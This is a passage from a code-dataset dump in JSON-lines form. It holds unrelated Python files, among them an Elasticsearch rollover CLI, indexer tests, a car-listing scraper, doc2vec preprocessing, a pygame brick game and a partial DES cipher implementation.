attributes):\n if tag != 'div':\n return\n for name, value in attributes:\n if name == 'class' and value == 'jive-rendered-content':\n self.recording = 1\n else:\n self.recording -= 1\n return\n\n def handle_endtag(self, tag):\n if tag == 'div' and self.recording:\n self.recording -= 1\n\n def handle_data(self, data):\n if self.recording:\n self.count += 1\n print('wshi---' + str(self.count))\n print(data)\n self.data = data\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)s %(message)s')\n import sys\n mojo = MOJOApi()\n\n report = Report(mojo, mail_list='virt-qe-list', filter_method='body', filter_key='7.2+Virt+QE+-+Week+')\n # report.load_report(1015195)\n # report.publish_report(1015195, dry_run=True)\n # report.publish_report()\n report.delete_report(1060753)\n # sys.exit(0)\n\n x = mojo.delete_document(1060753)\n # print mojo.create_document(\"test\", \"content\")\n # x = mojo.update_document(1060649, \"update\")\n # f = open(\"data.html\", 'r')\n # c = f.read()\n # x = mojo.update_document(1060649, c.replace('\\n', ''))\n","sub_path":"mojo_api/mojo_api.py","file_name":"mojo_api.py","file_ext":"py","file_size_in_byte":18666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"291892084","text":"# No 1\n# def calculate_years(principal, inyerest, tax, desired):\n\n# No 2\ndef expandedForm(num):\n expand1=str(num)\n expand2=[]\n expand3=[]\n for i in range(len(expand1)):\n expand2.append(expand1[i:])\n for j in range(len(expand2)):\n expand3.append(str(expand2[j]))\n print('+'.join(expand3))\nexpandedForm(12)\nexpandedForm(42)\nexpandedForm(70304)\n\ndef tower_builder(n_floor,block_size):\n w,h=block_size\n width=int(w)\n height=int(h)\n floor=int(n_floor)\n o=\"\"\n p=\"\"\n q=\"\"\n for a in range(width):\n for b in range(0,width-1-a):\n o+=\" \"\n for c in range(0,(width*a+2)):\n o+=\" * \"\n o+=\"\\n\"\n print(o)\n for k in range(height):\n for l in range(0,height):\n p+=\" \"\n for m in range(0,width):\n p+=\" * \"\n p+=\"\\n\"\n print(p)\n for x in range(floor):\n for y in range(0, height):\n q+=\" \"\n for z in range(0,width):\n q+=\" * \"\n q+=\"\\n\"\n print(q)\ntower_builder(3,(2,3))","sub_path":"ujian_modul_1.py","file_name":"ujian_modul_1.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"652930468","text":"# Copyright 2019 The LUCI Authors. All rights reserved.\n# Use of this source code is governed under the Apache License, Version 2.0\n# that can be found in the LICENSE file.\n\n'''Implement the LUCI \"run_build\" protocol.\n\nThis expects to read a build.proto[1] Build message on stdin (binary-encoded\nprotobuf), and will execute the task accordingly, selecting the recipe to run\nfrom the 'recipe' property of the `Build.input.properties` field.\n\nThis synthesizes properties from the Build message:\n * $recipe_engine/runtime['is_experimental'] = Build.input.experimental\n * $recipe_engine/runtime['is_luci'] = true\n * $recipe_engine/path['temp_dir'] = os.environ['TMP']\n * $recipe_engine/path['cache_dir'] = os.environ['LUCI_CACHE_DIR']\n'''\n\nimport argparse\nimport sys\nimport logging\n\n\nLOG = logging.getLogger(__name__)\n\n\nclass RunBuildContractViolation(Exception):\n pass\n\n\ndef add_arguments(parser):\n parser.add_argument(\n '--final-state', type=argparse.FileType('wb'),\n help='Path to write the final build.proto state to (as binary PB).')\n parser.add_argument(\n '--build-proto-jsonpb', action='store_true',\n help=(\n 'If specified, output build.proto datagrams as JSONPB instead of PB. '\n 'Only for debugging.'\n ))\n\n def _launch(args):\n from .cmd import main\n try:\n return main(args)\n except RunBuildContractViolation as ex:\n LOG.fatal('\"run_build\" protocol contract violation: %s', ex)\n return 1\n\n def _post(_error, _args):\n logging.basicConfig()\n\n parser.set_defaults(func=_launch, postprocess_func=_post)\n","sub_path":"recipe_engine/internal/commands/run_build/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"431287115","text":"#!/usr/bin/python3\n\nimport click\nimport logging\n\nfrom large_index.log import Log\nfrom large_index.config import Config\nfrom large_index.init import Init\nfrom large_index.structure import Structure\n\nclass_config = Config\nclass_structure = Structure()\nclass_log = Log()\n\nclass_log.remove_old_log_file()\nclass_log.get_file_handler()\nclass_log.get_stream_handler()\nclass_log.get_logger()\n\ndef logging_level(level):\n if level:\n logging_level_critical(level)\n logging_level_error(level)\n logging_level_warning(level)\n logging_level_info(level)\n logging_level_debug(level)\n logging_level_notset(level)\n\ndef logging_level_critical(level):\n if level == 'critical' or level == 'CRITICAL' or level == '=critical' or level == '=CRITICAL':\n class_log.logger.setLevel(logging.CRITICAL)\n\ndef logging_level_error(level):\n if level == 'error' or level == 'ERROR' or level == '=error' or level == '=ERROR':\n class_log.logger.setLevel(logging.ERROR)\n\ndef logging_level_warning(level):\n if level == 'warning' or level == 'WARNING' or level == '=warning' or level == '=WARNING':\n class_log.logger.setLevel(logging.WARNING)\n\ndef logging_level_info(level):\n if level == 'info' or level == 'INFO' or level == '=info' or level == '=INFO':\n class_log.logger.setLevel(logging.INFO)\n\ndef logging_level_debug(level):\n if level == 'debug' or level == 'DEBUG' or level == '=debug' or level == '=DEBUG':\n class_log.logger.setLevel(logging.DEBUG)\n\ndef logging_level_notset(level):\n if level == 'notset' or level == 'NOTSET' or level == '=notset' or level == '=NOTSET':\n class_log.logger.setLevel(logging.NOTSET)\n\ndef generating_variables():\n class_config.index_pools = Init(count = 4).list_pools()\n class_config.ilm_list = class_config.index_pools[3].json()\n class_config.settings_list = class_config.index_pools[2].json()\n class_config.alias_list = class_config.index_pools[1].json()\n\n class_structure.logger = class_log.logger\n\n class_structure.create_array_index_details_in_open()\n class_structure.create_array_index_to_remove()\n class_structure.remove_system_index_in_array()\n class_structure.create_array_indices()\n class_structure.create_array_max_indices()\n\n del(class_structure.index_details)\n del(class_structure.index_to_remove)\n\n class_structure.create_array_invalid_size_index()\n class_structure.remove_invalid_data_in_index( class_structure.invalid_size_indices )\n\n class_structure.create_array_unmanaged_index()\n class_structure.remove_invalid_data_in_index( class_structure.unmanaged_indices )\n\n class_structure.create_array_not_hot_box_index()\n class_structure.remove_invalid_data_in_index( class_structure.not_hot_box_indices )\n\n class_structure.create_array_not_hot_phase_index()\n class_structure.remove_invalid_data_in_index( class_structure.not_hot_phase_indices )\n\n class_structure.create_array_shrink_index()\n class_structure.remove_invalid_data_in_index( class_structure.shrink_indices )\n\n class_structure.create_last_index()\n class_structure.create_not_last_index()\n class_structure.create_last_shrink_index()\n\n del(class_structure.invalid_size_indices)\n del(class_structure.unmanaged_indices)\n del(class_structure.not_hot_box_indices)\n del(class_structure.not_hot_phase_indices)\n\ndef start_rollover_all(check_mode):\n if not check_mode:\n class_structure.rollover_last_index()\n class_structure.rollover_not_last_index()\n class_structure.rollover_last_shrink_index()\n\ndef start_check_mode_rollover_all(check_mode):\n if check_mode:\n class_structure.rollover_last_index_in_check_mode()\n class_structure.rollover_not_last_index_in_check_mode()\n class_structure.rollover_last_shrink_index_in_check_mode()\n\ndef start_rollover_last_index(check_mode):\n if not check_mode:\n class_structure.rollover_last_index()\n\ndef start_check_mode_rollover_last_index(check_mode):\n if check_mode:\n class_structure.rollover_last_index_in_check_mode()\n\ndef start_rollover_not_last_index(check_mode):\n if not check_mode:\n class_structure.rollover_not_last_index()\n\ndef start_check_mode_rollover_not_last_index(check_mode):\n if check_mode:\n class_structure.rollover_not_last_index_in_check_mode()\n\ndef start_rollover_last_shrink_indices(check_mode):\n if not check_mode:\n class_structure.rollover_last_shrink_index()\n\ndef start_check_mode_rollover_last_shrink_indices(check_mode):\n if check_mode:\n class_structure.rollover_last_shrink_index_in_check_mode()\n\n@click.group()\n@click.version_option()\ndef cli():\n \"\"\"\n Rollover big indexes ilm in Elasticsearch.\n \"\"\"\n pass\n\n@cli.command(help='Rollover large indexes.')\n@click.option(\n '-c', '--check-mode',\n is_flag=True,\n expose_value=True,\n help='Only displaying actions, without performing them.'\n)\n@click.option(\n '-l', '--log-level',\n default='info',\n show_default=False,\n expose_value=True,\n help='The output level of logs. \\n\\nOptions: NOTSET, DEBUG, INFO, WARNING, ERROR, CRITICAL'\n)\ndef start(check_mode, log_level):\n \"\"\"\n Rollover large indexes.\n \"\"\"\n logging_level(log_level)\n class_log.logger.info(\"Started rollover large indexes\")\n\n generating_variables()\n start_rollover_all(check_mode)\n start_check_mode_rollover_all(check_mode)\n\n@cli.command(help='Rollover only the latest big indexes (not shrink).')\n@click.option(\n '-c', '--check_mode',\n is_flag=True,\n expose_value=True,\n help='Only displaying actions, without performing them.'\n)\n@click.option(\n '-l', '--log-level',\n default='info',\n show_default=False,\n expose_value=True,\n help='The output level of logs. \\n\\nOptions: NOTSET, DEBUG, INFO, WARNING, ERROR, CRITICAL'\n)\ndef last_index(check_mode, log_level):\n \"\"\"\n Rollover only the latest big indexes (not shrink index).\n \"\"\"\n logging_level(log_level)\n class_log.logger.info(\"Started rollover only the latest big indexes (not shrink index).\")\n\n generating_variables()\n start_rollover_last_index(check_mode)\n start_check_mode_rollover_last_index(check_mode)\n\n@cli.command(help='Rollover only the not latest big indexes (not shrink).')\n@click.option(\n '-c', '--check_mode',\n is_flag=True,\n expose_value=True,\n help='Only displaying actions, without performing them.'\n)\n@click.option(\n '-l', '--log-level',\n default='info',\n show_default=False,\n expose_value=True,\n help='The output level of logs. \\n\\nOptions: NOTSET, DEBUG, INFO, WARNING, ERROR, CRITICAL'\n)\ndef not_last_index(check_mode, log_level):\n \"\"\"\n Rollover only the not latest big indexes (not shrink index).\n \"\"\"\n logging_level(log_level)\n class_log.logger.info(\"Started rollover only the not latest big indexes (not shrink index)\")\n\n generating_variables()\n start_rollover_not_last_index(check_mode)\n start_check_mode_rollover_not_last_index(check_mode)\n\n@cli.command(help='Rollover only the latest big shrink indexes.')\n@click.option(\n '-c', '--check_mode',\n is_flag=True,\n expose_value=True,\n help='Only displaying actions, without performing them.'\n)\n@click.option(\n '-l', '--log-level',\n default='info',\n show_default=False,\n expose_value=True,\n help='The output level of logs. \\n\\nOptions: NOTSET, DEBUG, INFO, WARNING, ERROR, CRITICAL'\n)\ndef last_shrink_index(check_mode, log_level):\n \"\"\"\n Rollover only the latest big shrink indexes.\n \"\"\"\n logging_level(log_level)\n class_log.logger.info(\"Started rollover only the latest big shrink indexes\")\n\n generating_variables()\n start_rollover_last_shrink_indices(check_mode)\n start_check_mode_rollover_last_shrink_indices(check_mode)\n\nif __name__ == \"__main__\":\n cli()\n","sub_path":"large_index/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"507646248","text":"import mock\nimport pytest\n\n\n@pytest.fixture\ndef es(elasticsearch_server):\n from ..elasticsearch_client import ElasticsearchClient\n return ElasticsearchClient(elasticsearch_server, 'vms')\n\n\ndef test_WTAIndexer(es, sf):\n from ..commands.indexer import WTAIndexer\n indexer = WTAIndexer(es, sf)\n indexer.update_index()\n\n\ndef test_WorkPartyIndexer(es, sf):\n # add a work party that's not in Salesforce to make sure it gets removed\n es.index(doc_type='workparty', body={}, id='TODELETE')\n es.indices.refresh(index='vms')\n es.indices.flush()\n\n from ..commands.indexer import WorkPartyIndexer\n indexer = WorkPartyIndexer(es, sf)\n indexer.update_index()\n\n # Make sure TODELETE was removed and WP1 was added\n res = es.search(body={'filter': {'type': {'value': 'workparty'}}, 'fields': []})['hits']['hits']\n assert len(res) == 1\n assert res[0]['_id'] == 'WP1'\n\n\ndef test_WaiverTextIndexer(es, sf):\n from ..commands.indexer import WaiverTextIndexer\n indexer = WaiverTextIndexer(es, sf)\n indexer.update_index()\n\n res = es.search(body={'filter': {'type': {'value': 'liabilitywaiver'}}})['hits']['hits']\n assert len(res) == 1\n\n\ndef test_LandManagerIndexer(es, sf):\n # add a land manager that's not in Salesforce to make sure it gets removed\n es.index(doc_type='landmanager', body={}, id='TODELETE')\n es.indices.refresh(index='vms')\n es.indices.flush()\n\n from ..commands.indexer import LandManagerIndexer\n indexer = LandManagerIndexer(es, sf)\n indexer.update_index()\n\n # Make sure TODELETE was removed and LM1 was added\n res = es.search(body={'filter': {'type': {'value': 'landmanager'}}, 'fields': []})['hits']['hits']\n assert len(res) == 1\n assert res[0]['_id'] == 'LM1'\n\n\ndef test_AwardCustomizationIndexer(es, sf):\n # add an award customization that's not in Salesforce to make sure it gets removed\n es.index(doc_type='awardcustomization', body={}, id='TODELETE')\n es.indices.refresh(index='vms')\n es.indices.flush()\n\n from ..commands.indexer import AwardCustomizationIndexer\n indexer = AwardCustomizationIndexer(es, sf)\n indexer.update_index()\n\n # Make sure TODELETE was removed and AC1 was added\n res = es.search(body={'filter': {'type': {'value': 'awardcustomization'}}, 'fields': []})['hits']['hits']\n assert len(res) == 1\n assert res[0]['_id'] == 'AC1'\n\n\ndef test_run_indexer(app):\n from ..commands.indexer import run_indexer\n abort_event = mock.Mock(**{'wait.return_value': True})\n run_indexer(app, abort_event)\n\n\ndef test_run_indexer_thread(mocker):\n app = mocker.Mock()\n mocker.patch('vms.commands.indexer.run_indexer')\n from ..commands.indexer import run_indexer_thread\n from ..commands.indexer import run_indexer\n run_indexer_thread(app)\n\n run_indexer.assert_called_once()\n","sub_path":"src/vms/tests/test_indexer.py","file_name":"test_indexer.py","file_ext":"py","file_size_in_byte":2827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"329563680","text":"import os\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport csv\nimport subprocess\n\nHEADERS = {\n \"user-agent\": \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36\",\n \"accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\n}\n\nHOST = \"https://avto.ria.com\"\nPATH = \"cars.csv\"\n\n\ndef get_html(url, params=None):\n response = requests.get(url, headers=HEADERS, params=params)\n return response\n\n\ndef get_content(html):\n soup = BeautifulSoup(html, \"html.parser\")\n items = soup.find_all(\"div\", class_=\"proposition\")\n cars = []\n for item in items:\n cars.append(\n {\n \"title\": item.find(\"div\", class_=\"proposition_title\").get_text(\n strip=True\n ),\n \"link\": HOST + item.find(\"a\", class_=\"proposition_link\").get(\"href\"),\n \"photo\": item.find(\"div\", class_=\"photo-car\").find(\"img\").get(\"src\"),\n \"USD\": item.find(\"span\", class_=\"green\").get_text(strip=True),\n \"UAH\": item.find(\"span\", class_=\"grey size13\").get_text(strip=True),\n \"city\": item.find(\"div\", class_=\"proposition_region size13\")\n .find_next(\"strong\")\n .get_text(strip=True),\n }\n )\n return cars\n\n\ndef pages_count(html):\n soup = BeautifulSoup(html, \"html.parser\")\n pagination = soup.find_all(\"span\", class_=\"page-item mhide\")\n return int(pagination[-1].get_text())\n\n\ndef parse():\n url = input(\"Введите URL:\").strip()\n html = get_html(url)\n if not html.status_code == 200:\n return print(\"Error\")\n pages = pages_count(html.text)\n cars = []\n for page in range(1, pages + 1):\n html = get_html(url, params={\"page\": page})\n cars.extend(get_content(html.text))\n save_data(cars, PATH)\n\n\ndef save_data(data, path):\n with open(path, \"w\", newline=\"\") as fp:\n writer = csv.writer(fp, delimiter=\";\")\n writer.writerow([\"Brend\", \"Link\", \"USD\", \"UAH\", \"City\", \"Image\"])\n for item in data:\n writer.writerow(\n [\n item[\"title\"],\n item[\"link\"],\n item[\"USD\"],\n item[\"UAH\"],\n item[\"city\"],\n item[\"photo\"],\n ]\n )\n image = get_html(item[\"photo\"])\n name = item[\"photo\"].split(\"/\")[-1]\n\n if not os.path.exists('img/'):\n os.mkdir('img/')\n with open(f\"img/{name}\", \"wb\") as fp:\n fp.write(image.content)\n\nparse()\n","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"286453917","text":"import pickle\nfrom collections import Counter\nimport re\nimport numpy as np\nfrom stemming.porter2 import stem\nfrom gensim.models.doc2vec import TaggedDocument\n\nnegations = [\"didn't\", \"didn\", \"don\", \"don't\", \"not\", \"doesn\", \"doesn't\", \"isn\", \"isn't\"]\ndelims = [\"?\", \".\", \",\", \"!\", \":\", \";\"]\n\n\ndef tweets_to_tagged_sentences(tweets, key):\n tagged_documents = []\n for uid, tweet in enumerate(tweets):\n tagged_documents.append(TaggedDocument(words=tweet.split(), tags=[key+'_%s' % uid]))\n return tagged_documents\n\n\ndef preprocessing(dataset, key):\n # init\n tweets = []\n words = []\n\n # save all tweets as list of words in list \"tweets\"\n for i, tweet in enumerate(dataset):\n tweet_words = tweet.split()\n tweet_new_words = []\n neg = False\n for w in tweet_words:\n if w in delims:\n neg = False\n tweet_new_words.append(w)\n elif w in negations:\n neg = True\n tweet_new_words.append(w)\n elif neg:\n tweet_new_words.append(\"NOT_\"+w)\n else:\n tweet_new_words.append(w)\n\n words += tweet_new_words\n tweets.append(' '.join(tweet_new_words))\n\n if (i+1) % 500 == 0:\n print(\"Processing dataset '{}', tweet {}/{}\".format(key, i+1, len(dataset)))\n\n return tweets_to_tagged_sentences(tweets, key)\n\nprint(\"Loading datasets...\")\n\n# read training dataset\ndataset_trn_pos = open('data/train_pos.txt', 'r').read().splitlines()\ndataset_trn_neg = open('data/train_neg.txt', 'r').read().splitlines()\n\n# read test dataset\ndataset_tst_file = open('data/test_data.txt', 'r')\ndataset_tst = [re.sub('^[0-9]+,','', i)[:-2] for i in dataset_tst_file]\n\nprint(\"Starting preprocessing...\")\n\n# preprocess datasets\ndataset_trn_pos = preprocessing(dataset_trn_pos, 'trn_pos')\ndataset_trn_neg = preprocessing(dataset_trn_neg, 'trn_neg')\ndataset_tst = preprocessing(dataset_tst, 'tst')\n\n# save model and word_count\npickle.dump(dataset_trn_pos + dataset_trn_neg, open('preprocessing/dataset_trn', 'wb'))\npickle.dump(dataset_tst, open('preprocessing/dataset_tst', 'wb'))\n\n# create target dataset for training set\ntarget_tst = np.ravel(np.concatenate((np.ones((len(dataset_trn_pos), 1)),\n np.ones((len(dataset_trn_neg), 1))*-1)))\n\nnp.save('preprocessing/target_trn', target_tst)\n\nprint(\"Done!\")","sub_path":"code/doc2vec/1 preprocessing.py","file_name":"1 preprocessing.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"74319008","text":"# -*- coding: cp936 -*-\r\nimport pygame\r\nimport sys\r\nimport os\r\nfrom random import *\r\nfrom math import *\r\n#设定屏幕大小\r\nscreenSize = 600,600\r\n#设定砖块大小\r\nbrickWidth = 60\r\nbrickHeight = 15\r\n#设定挡板大小\r\nbaffleWidth = 80\r\nbaffleHeight = 12\r\n#设定小球大小\r\nradius = 8\r\ndiameter = 2*radius\r\n#设定挡板移动速度\r\nbaffleVelocity = 5\r\n#设定小球移动速度\r\nballVelocity = [5,5]\r\n#设定最大移动范围\r\nminXpos = 0\r\nminBallXpos = 0\r\nminBallYpos = 0\r\nmaxXpos = screenSize[0] - baffleWidth\r\nmaxBallXpos = screenSize[0] - diameter\r\nmaxBallYpos = screenSize[1] - diameter - 10\r\n#设定挡板位置(均以左上角计)\r\nbaffleXpos = (screenSize[0] - baffleWidth)/2\r\nbaffleYpos = screenSize[1] - baffleHeight -10\r\n#设定小球位置\r\nballXpos = screenSize[0]/2 - radius\r\nballYpos = baffleYpos -diameter \r\n#定义颜色\r\nBLACK = (0,0,0)\r\nWHITE = (255,255,255)\r\nBLUE = (0,0,255)\r\nbrickColor = (184,134,11)\r\n\r\n#定义状态常量\r\nState_restarting = 0\r\nState_playing = 1\r\nState_win = 2\r\nState_gameover = 3\r\nState_highscore=4\r\nState_stopping=5\r\n\r\n#程序的封装\r\nclass Brick:\r\n def __init__(self):\r\n #初始化pygame模块\r\n pygame.init()\r\n\r\n #初始化混音器\r\n pygame.mixer.init()\r\n pygame.time.delay(1000)\r\n\r\n #创建游戏窗口\r\n self.screen = pygame.display.set_mode(screenSize,0)\r\n#无边框版self.screen = pygame.display.set_mode(screenSize,pygame.NOFRAME)\r\n\r\n #设置窗口标题\r\n pygame.display.set_caption(\"Bricks by zwh\")\r\n\r\n #将图像数据都转化为Surface对象\r\n self.background=pygame.image.load(\"bg.png\").convert()\r\n\r\n #载入背景音乐\r\n self.soundwav=pygame.mixer.Sound(\"bgmusic.wav\")\r\n #设定时钟\r\n self.clock = pygame.time.Clock()\r\n\r\n #载入字体 \r\n self.font = pygame.font.Font(\"Lancy.ttf\",23)\r\n self.font2 = pygame.font.Font(\"Kevin.ttf\",20)\r\n\r\n self.init_game()\r\n\r\n #��取最高分\r\n def highScore(self): \r\n if os.path.isfile(\"highscore.dat\"):\r\n highfile=open(\"highscore.dat\",\"r\")\r\n highscore=highfile.readline() \r\n highfile.close() \r\n else:\r\n highscore=0\r\n return highscore\r\n\r\n #游戏数据初始化(变化的)\r\n def init_game(self):\r\n #初始化生命得分和状态\r\n self.lives = 3\r\n self.score = 0\r\n self.level = 1\r\n #初始化小球速度\r\n self.ballVelocity = ballVelocity\r\n #读取最高分\r\n self.highscore = self.highScore()\r\n self.state = State_restarting\r\n #创建挡板和小球的矩形范围\r\n self.baffle = pygame.Rect(baffleXpos,baffleYpos,baffleWidth,baffleHeight)\r\n self.ball = pygame.Rect(ballXpos,ballYpos,diameter,diameter)\r\n #执行创建砖块矩形函数\r\n self.create_bricks()\r\n\r\n #升级时数据更新\r\n def next_game(self):\r\n self.level+=1\r\n self.lives += 1\r\n self.state = State_restarting\r\n self.baffle = pygame.Rect(baffleXpos,baffleYpos,baffleWidth,baffleHeight)\r\n self.ball = pygame.Rect(ballXpos,ballYpos,diameter,diameter)\r\n self.create_bricks()\r\n \r\n \r\n #创建砖块矩形范围\r\n def create_bricks(self):\r\n ypos= 30\r\n self.bricks = []\r\n for i in range(7):\r\n xpos = 25\r\n for j in range(8):\r\n self.bricks.append(pygame.Rect(xpos,ypos,brickWidth,brickHeight))\r\n xpos += brickWidth+ 10\r\n ypos += brickHeight + 5\r\n\r\n #画出砖块\r\n def draw_bricks(self):\r\n for brick in self.bricks:\r\n pygame.draw.rect(self.screen, brickColor, brick)\r\n #pygame.draw.ellipse(self.screen, brickColor, brick) 椭圆版 \r\n\r\n #侦测键盘输入控制平台位置 \r\n def keyInput(self):\r\n keys = pygame.key.get_pressed()\r\n\r\n #左键左移\r\n if keys[pygame.K_LEFT] and self.state != State_stopping:\r\n self.baffle.left -= baffleVelocity\r\n if self.baffle.left <= minXpos:\r\n self.baffle.left = minXpos\r\n\r\n #右键右移\r\n if keys[pygame.K_RIGHT] and self.state != State_stopping:\r\n self.baffle.left += baffleVelocity\r\n if self.baffle.left >= maxXpos:\r\n self.baffle.left = maxXpos\r\n \r\n # 太空版(测试Win使用)\r\n ##上键上移\r\n if keys[pygame.K_UP]:\r\n self.baffle.top -= baffleVelocity\r\n ##下键下移\r\n if keys[pygame.K_DOWN]:\r\n self.baffle.top += baffleVelocity\r\n \r\n #Space重置\r\n elif keys[pygame.K_SPACE] and self.state == State_restarting:\r\n self.ballVelocity= [4 + self.level,4 + self.level]\r\n # 随机角度发射(+-30°之间)\r\n # base= (4+self.level)*2**0.5\r\n # angle=randrange(-30,30)/180.0*pi\r\n # self.ballVelocity= [base*sin(angle),-base*cos(angle)]\r\n self.state = State_playing\r\n\r\n #失败时回车重新启动\r\n elif keys[pygame.K_RETURN] and (self.state == State_gameover \\\r\n or self.state == State_highscore):\r\n self.init_game()\r\n elif keys[pygame.K_RETURN] and self.state == State_win:\r\n self.next_game()\r\n #游戏时按回车暂停\r\n elif keys[pygame.K_RETURN] and self.state == State_playing:\r\n self.state = State_stopping\r\n elif keys[pygame.K_SPACE] and self.state == State_stopping:\r\n self.state = State_playing\r\n\r\n def move_ball(self):\r\n\r\n #移动距离 速度V*Δt(与帧数相关) 以左上角为标准\r\n self.ball.left += self.ballVelocity[0]\r\n self.ball.top += self.ballVelocity[1]\r\n\r\n #碰壁反向\r\n if self.ball.left <= minBallXpos:\r\n self.ball.left = minBallXpos\r\n self.ballVelocity[0] *= -1\r\n elif self.ball.left >= maxBallXpos:\r\n self.ball.left = maxBallXpos\r\n self.ballVelocity[0] *= -1\r\n elif self.ball.top <= minBallYpos:\r\n self.ball.top = minBallYpos \r\n self.ballVelocity[1] *= -1\r\n #触底静止\r\n elif self.ball.top >= maxBallYpos: \r\n self.ball.top = maxBallYpos\r\n\r\n #碰撞处理\r\n def collision(self):\r\n\r\n #对于每一块砖块进行判断 加分 反弹 砖块消除\r\n for brick in self.bricks:\r\n if self.ball.colliderect(brick):\r\n self.score += 10*self.level\r\n self.ballVelocity[1] *= -1\r\n self.bricks.remove(brick)\r\n break\r\n #碰撞挡板反弹\r\n if self.ball.colliderect(self.baffle):\r\n self.ball.top = self.baffle.top - diameter\r\n self.ballVelocity[1] *= -1\r\n\r\n #状态判断模块\r\n if self.bricks == []:\r\n self.state = State_win\r\n \r\n elif self.ball.top == maxBallYpos:\r\n self.lives -= 1\r\n if self.lives > 0:\r\n self.state = State_restarting\r\n #死亡操作\r\n elif self.lives == 0 and self.score > int(self.highscore):\r\n self.state = State_highscore\r\n else:\r\n self.state = State_gameover\r\n \r\n def writeHighScore(self): #写入最高分\r\n highfile=open(\"highscore.dat\",\"w\") \r\n highfile.writelines(str(self.score)) \r\n highfile.close() \r\n \r\n #显示基本状态\r\n def show_stats(self):\r\n myRecord = self.font2.render(\"RECORD: \" + str(self.highscore), True, WHITE)\r\n myScore = self.font2.render(\" SCORE: \" + str(self.score), True, WHITE)\r\n myLife = self.font2.render(\" LIVES: \" + str(self.lives), True, WHITE)\r\n myLevel = self.font.render(\" LEVLE \" + str(self.level), True, WHITE)\r\n self.screen.blit(myRecord, (450,5))\r\n self.screen.blit(myScore, (300,5))\r\n self.screen.blit(myLife, (200,5))\r\n self.screen.blit(myLevel, (0,0))\r\n #获取程序Fps\r\n # self.fps=int(self.clock.get_fps()) #为了去掉末尾的小数\r\n # myfps=self.font2.render(\"FPS: \" + str(self.fps) , True, WHITE)\r\n # self.screen.blit(myfps, (5,580))\r\n\r\n #显示关键信息模块\r\n def show_message(self,message):\r\n #获取字体大小使文字显示在中央\r\n size = self.font.size(message)\r\n font_surface = self.font.render(message,True, WHITE)\r\n x = (screenSize[0] - size[0]) / 2\r\n y = (screenSize[1] - size[1]) / 2\r\n self.screen.blit(font_surface, (x,y))\r\n \r\n \r\n #运行过程 \r\n def run(self):\r\n #播放背景音乐(-1表示循环)\r\n self.soundwav.play(-1)\r\n\r\n while True: \r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n #控制帧数\r\n self.clock.tick(100)\r\n #生成背景\r\n self.screen.blit(self.background, (0,0))\r\n #self.screen.fill((0,0,0))#黑屏版\r\n #self.screen.fill((255,255,255))#白屏版\r\n\r\n #执行按键侦测\r\n self.keyInput()\r\n #判断游戏所处在的状态并给出相应反馈\r\n if self.state == State_playing: #只有在该状态下才会触发移动和碰撞\r\n self.move_ball()\r\n self.collision()\r\n elif self.state == State_restarting:\r\n self.ball.left = self.baffle.left + self.baffle.width / 2 - radius\r\n self.ball.top = self.baffle.top - self.ball.height\r\n self.show_message(\"Press SPACE to Launch the Ball\")\r\n elif self.state == State_gameover:\r\n self.show_message(\"~Game over!~Press ENTER to retry\")\r\n elif self.state == State_highscore:\r\n self.show_message(\"~New Record!!!~Press ENTER to play again\")\r\n self.writeHighScore()\r\n elif self.state == State_win:\r\n self.show_message(\"~Congratulations!~Press ENTER to go\")\r\n elif self.state == State_stopping:\r\n self.show_message(\"~Pause~\")\r\n\r\n #画出砖块\r\n self.draw_bricks()\r\n #执行显示状态\r\n self.show_stats()\r\n #画出挡板\r\n pygame.draw.rect(self.screen, BLUE, self.baffle)\r\n #画出小球\r\n pygame.draw.circle(self.screen, WHITE, \\\r\n (self.ball.left + radius, self.ball.top + radius), radius)\r\n\r\n #更新显示到屏幕表面\r\n pygame.display.flip()\r\n\r\nmyMasterpiece=Brick()\r\nmyMasterpiece.run()\r\n","sub_path":"[bug]BricksV1.35更新随机角度发射.py","file_name":"[bug]BricksV1.35更新随机角度发射.py","file_ext":"py","file_size_in_byte":10834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"381603585","text":"from __future__ import print_function\nfrom BitVector import *\nfrom tables import *\n\n#key file\nkey_filename = 'key.txt'\n\n#message file\nmsg_filename = 'message.txt'\n\n#holds key for all 16 rounds\nkey_round = []\n\n\ndef getEncryptionKeys(key):\n mkey = key.deep_copy()\n mkey = mkey.permute(pc1)\n left, right = mkey.divide_into_two()\n for r in shift_round:\n left< 0:\n if bv1.length() < 64:\n pad = 64 - bv1.length()\n temp = bv1 + BitVector(intVal=0, size=pad)\n ev = des(temp)\n ev.write_to_file(output_file)\n else:\n ev = des(bv1)\n ev.write_to_file(output_file)\n bv1 = bv.read_bits_from_file(64)\n output_file.close()\n bv.close_file_object()\n\n\ndef des(msg):\n msg = msg.deep_copy()\n msg = msg.permute(ip)\n left, right = msg.divide_into_two()\n for i in range(0, 16):\n\n temp_right = substitute(right,key_round[i])\n temp_right = left ^ temp_right\n left, right = right, temp_right\n msg = right + left\n msg = msg.permute(inverse_ip)\n return msg\n\n\ndef substitute(right,key):\n mright = right.deep_copy()\n mright = mright.permute(exp_perm)\n mright = mright ^ key\n count = 0\n sv = []\n for i in 